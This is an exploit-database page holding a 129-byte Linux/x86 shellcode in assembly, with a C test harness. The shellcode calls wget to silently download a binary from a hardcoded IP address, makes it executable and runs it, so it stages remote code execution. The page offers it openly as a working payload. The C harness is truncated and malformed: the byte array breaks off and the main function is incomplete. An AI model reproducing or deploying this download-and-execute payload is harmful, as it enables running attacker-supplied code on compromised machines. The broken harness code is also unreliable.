Linux/x86 chmod + execute (/usr/bin/wget + hide output shellcode (129 bytes) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-06-28 | Type : shellcode | Platform : linux_x86
This exploit / vulnerability Linux/x86 chmod + execute (/usr/bin/wget + hide output shellcode (129 bytes) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...


; Shellcode 129 Bytes
; download (via wget) + chmod + execute shellcode + hide output
; Exec: /usr/bin/wget > /dev/null 2>&1

global _start

section .text


xor eax,eax
mov al,0x2
int 0x80
xor ebx,ebx
cmp eax,ebx
jz download

; wait(NULL)
xor eax,eax
mov al,0x7
int 0x80

; give execution permissions to the binary x
xor ecx,ecx
xor eax, eax
push eax
mov al, 0xf
push 0x78
mov ebx, esp
xor ecx, ecx
mov cx, 0x1ff
int 0x80

; execution of binary x
xor eax, eax
push eax
push 0x78
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80


push 0xb
pop eax
push edx
; download uri
mov eax, 0x31263e32 ; 1&>2 hide_output[4]
mov eax, 0x6c6c756e ; llun/ hide_output[3]
mov eax, 0x2f766564 ; ved hide_output[2]
mov eax, 0x2f3e20 ; /> hide_output[1]
mov eax, 0x782f2f ; x// path[1]
mov eax, 0x33392e31 ;93.1 addr[3]
mov eax, 0x2e383631 ;.861 addr[2]
mov eax, 0x2e323931 ;.291 addr[1]
push eax
mov ecx,esp
push edx

; download execution in /usr/bin/wget

push 0x74 ;t
push 0x6567772f ;egw/
push 0x6e69622f ;nib/
push 0x7273752f ;rsu/
mov ebx,esp
push edx
push ecx
push ebx
mov ecx,esp
int 0x80


// nasm -felf32 wget.nasm -o wget.o
// ld -m elf_i386 wget.o -o wget

#include <stdio.h>
#include <string.h>

// gcc -z execstack -fno-stack-protector shellcode.c -o shellcode

// SHELLCODE 129 Bytes

char buf[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8"

void main(int argc, char **argv)
int (*func)();
func = (int (*)()) buf;

Linux/x86 chmod + execute (/usr/bin/wget + hide output shellcode (129 bytes)

Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php

▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple

▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php

Linux/x86 chmod + execute (/usr/bin/wget + hide output shellcode (129 bytes) Vulnerability / Exploit